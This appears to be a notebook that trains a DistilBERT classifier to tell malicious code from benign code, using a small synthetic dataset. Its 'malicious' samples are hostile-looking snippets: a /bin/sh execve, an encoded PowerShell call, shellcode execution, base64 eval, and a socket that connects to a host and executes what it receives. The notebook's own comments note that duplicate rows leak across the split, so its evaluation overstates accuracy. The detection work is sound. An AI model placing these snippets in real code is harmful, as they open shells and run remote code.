pip install transformers datasets scikit-learn

In [None]:
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from transformers import DistilBertTokenizer, TFDistilBertForSequenceClassification
import tensorflow as tf

 
# 1. Simulate Obfuscated vs. Clean Code
 
def load_dataset(repeats=100):
    """Build a small synthetic dataset of malicious-looking and benign code snippets.

    Five hard-coded snippets per class are replicated ``repeats`` times each.

    NOTE: every row is an exact copy of one of ten distinct strings, so a
    random row-level train/test split will contain the same strings on both
    sides.

    Args:
        repeats: Number of times each snippet list is replicated. The default
            of 100 yields 500 rows per class (1000 rows in total).

    Returns:
        A pandas DataFrame with two columns: 'code' (the snippet text) and
        'label' (1 for snippets from the malicious list, 0 for the benign
        list). All malicious rows come first, followed by all benign rows.
    """
    malicious = [
        "char*x=strcat(strcpy(malloc(8),\"/bin\"),\"/sh\");execve(x,0,0);",
        "int a=system(\"powershell -enc JABX... \");",
        "unsigned char code[]={0x90,0x90,0x90,...};((void(*)())code)();",
        "eval(base64.b64decode(b'cHJpbnQoIkhlbGxvIik='))",
        "import socket; socket.connect(('10.0.0.1', 6666)); exec(sock.recv(2048))",
    ]

    benign = [
        "def greet(): print(\"Hello World\")",
        "int main() { printf(\"Welcome\"); return 0; }",
        "document.getElementById(\"btn\").addEventListener(\"click\", greet);",
        "System.out.println(\"Login successful\");",
        "#include<stdio.h>\nvoid sum() { int a=2,b=3; printf(\"%d\",a+b); }",
    ]

    # Labels are built from the replicated list lengths so they always stay
    # aligned with the texts, whatever value of `repeats` is used.
    texts = malicious * repeats + benign * repeats
    labels = [1] * (len(malicious) * repeats) + [0] * (len(benign) * repeats)

    return pd.DataFrame({'code': texts, 'label': labels})

 
# 2. Preprocess with Tokenizer
 
def prepare_data(df):
    """Tokenize the 'code' column of `df` and convert its 'label' column to a tensor.

    Args:
        df: DataFrame with a 'code' column of strings and a 'label' column.

    Returns:
        A 3-tuple ``(encodings, labels, tokenizer)``: the tokenizer output for
        all snippets (truncated to at most 128 tokens and padded), the labels
        as a TensorFlow tensor, and the tokenizer instance so callers can
        reuse it.
    """
    tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')

    snippets = df['code'].tolist()
    encodings = tokenizer(
        snippets,
        truncation=True,
        padding=True,
        max_length=128,
    )

    label_tensor = tf.convert_to_tensor(df['label'].values)
    return encodings, label_tensor, tokenizer

 
# 3. Train Transformer Model
 
def train_model(encodings, labels, epochs=3, batch_size=16, learning_rate=5e-5):
    """Fine-tune a two-class DistilBERT sequence classifier on the given data.

    Args:
        encodings: Tokenizer output for the training snippets; it is turned
            into a plain dict of model inputs via ``dict(encodings)``.
        labels: Per-example class ids, aligned with `encodings`.
        epochs: Number of passes over the training data (default 3).
        batch_size: Number of examples per training batch (default 16).
        learning_rate: Learning rate for the Adam optimizer (default 5e-5).

    Returns:
        The trained ``TFDistilBertForSequenceClassification`` model.
    """
    model = TFDistilBertForSequenceClassification.from_pretrained(
        'distilbert-base-uncased', num_labels=2)

    dataset = tf.data.Dataset.from_tensor_slices((dict(encodings), labels))

    # Use a shuffle buffer that spans the whole dataset. A fixed buffer
    # smaller than the dataset only shuffles within a sliding window, so
    # examples stay close to their original position. `max(..., 1)` keeps the
    # buffer size valid even for an empty label set.
    buffer_size = max(len(labels), 1)
    dataset = dataset.shuffle(buffer_size).batch(batch_size)

    # The loss is configured with from_logits=True, i.e. it expects the
    # model's raw (un-normalized) outputs.
    model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate),
                  loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
                  metrics=['accuracy'])

    model.fit(dataset, epochs=epochs)
    return model


In [None]:
def evaluate_model(model, tokenizer, df):
    """Print a classification report for `model` on the rows of `df`.

    Args:
        model: Trained classifier whose ``predict`` output exposes ``.logits``.
        tokenizer: Tokenizer used to encode the 'code' column.
        df: DataFrame with a 'code' column of strings and a 'label' column
            holding the reference classes.

    Returns:
        None. The report is written to standard output.
    """
    snippets = df['code'].tolist()
    tokenized = tokenizer(snippets, truncation=True, padding=True, max_length=128)

    # Inputs only (no labels); batching does not reorder rows, so predictions
    # line up with df['label'].
    batches = tf.data.Dataset.from_tensor_slices(dict(tokenized)).batch(16)

    logits = model.predict(batches).logits
    predictions = tf.argmax(logits, axis=1).numpy()

    report = classification_report(df['label'], predictions)
    print("\nClassification Report:\n", report)


In [None]:
if __name__ == "__main__":
    # End-to-end run: build the synthetic dataset, hold out 20% of the rows,
    # fine-tune on the remaining 80%, then print a report for the hold-out.
    df = load_dataset()
    # NOTE(review): load_dataset() replicates ten distinct snippets, so this
    # random row-level split puts copies of the same strings in both train_df
    # and test_df. The printed report therefore does not measure
    # generalization to unseen code.
    # random_state=42 makes the split reproducible between runs.
    train_df, test_df = train_test_split(df, test_size=0.2, random_state=42)
    
    encodings, labels, tokenizer = prepare_data(train_df)
    model = train_model(encodings, labels)

    # The tokenizer returned by prepare_data is reused so that test snippets
    # are encoded the same way as the training snippets.
    evaluate_model(model, tokenizer, test_df)